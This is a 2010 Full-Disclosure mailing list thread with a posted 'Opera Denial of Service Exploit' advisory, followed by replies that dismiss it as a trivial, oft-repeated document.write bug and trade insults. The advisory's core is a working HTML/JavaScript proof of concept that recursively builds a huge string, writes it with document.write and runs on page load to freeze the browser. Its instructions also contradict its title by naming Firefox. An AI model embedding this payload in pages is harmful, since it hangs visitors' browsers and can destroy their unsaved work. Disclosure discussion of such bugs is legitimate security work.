You get a life. Fixed.
2010/3/3 information security <informationhacke...@gmail.com> > Thanks .Jeff for all your comment > so how to fix that > > > On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <jeffwilli...@gmail.com>wrote: > >> You gotta be joking, this is probably the 3000th DoS "advisory" for >> document.write. >> >> Guess what sparky, even Jeremy Brown didn't post that one. >> >> Thus no surprise exploit-db post this kind of shit. >> >> >> 2010/3/3 information security <informationhacke...@gmail.com> >> >>> ====================================================================== >>> >>> >>> Opera (plenitude String )Denial of Service Exploit >>> >>> ======================================================================= >>> >>> >>> >>> by >>> >>> Asheesh Kumar Mani Tripathi >>> >>> >>> # code by Asheesh kumar Mani Tripathi >>> >>> # email informationhacke...@gmail.com >>> >>> >>> >>> # company www.aksitservices.co.in >>> >>> # Credit by Asheesh Anaconda >>> >>> >>> #Download http://www.opera.com/download/ >>> >>> >>> >>> >>> #Background >>> >>> Opera is a popular internet browser :) >>> >>> #Vulnerability >>> This bug is a typical result when attacker try to write plenitude String in >>> document.write() function .User interaction is required to >>> >>> >>> >>> exploit this vulnerability in that the target must visit a malicious >>> web page. >>> >>> >>> >>> #Impact >>> Browser doesn't respond any longer to any user input, all tabs are no >>> longer accessible, your work if any might be lost. >>> >>> >>> >>> >>> >>> #Proof of concept >>> copy the code in text file and save as "asheesh.html" open in Mozilla >>> Firefox >>> >>> ======================================================================================================================== >>> >>> >>> >>> asheesh.html >>> ======================================================================================================================== >>> >>> <html> >>> >>> >>> >>> <title>asheesh kumar mani tripathi</title> >>> Asheesh kumar Mani Tripathi >>> <head> >>> >>> <script> >>> >>> >>> >>> function asheesh () >>> { >>> var i , anaconda = "XXXX" >>> for(i=24;i >0 ;--i) >>> >>> >>> >>> { >>> anaconda=anaconda+anaconda; >>> } >>> >>> document.write(anaconda); >>> >>> asheesh(); >>> >>> } >>> asheesh(); >>> >>> </script> >>> </head> >>> >>> <body onLoad="asheesh()"></body> >>> >>> >>> >>> </html> >>> >>> >>> >>> ======================================================================================================================== >>> Why do you worry without cause? Whom do you fear without reason? Who can >>> kill you? >>> >>> >>> >>> The soul is neither born, nor does it die. >>> >>> >>> #If you have any questions, comments, or concerns, feel free to contact me. >>> >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
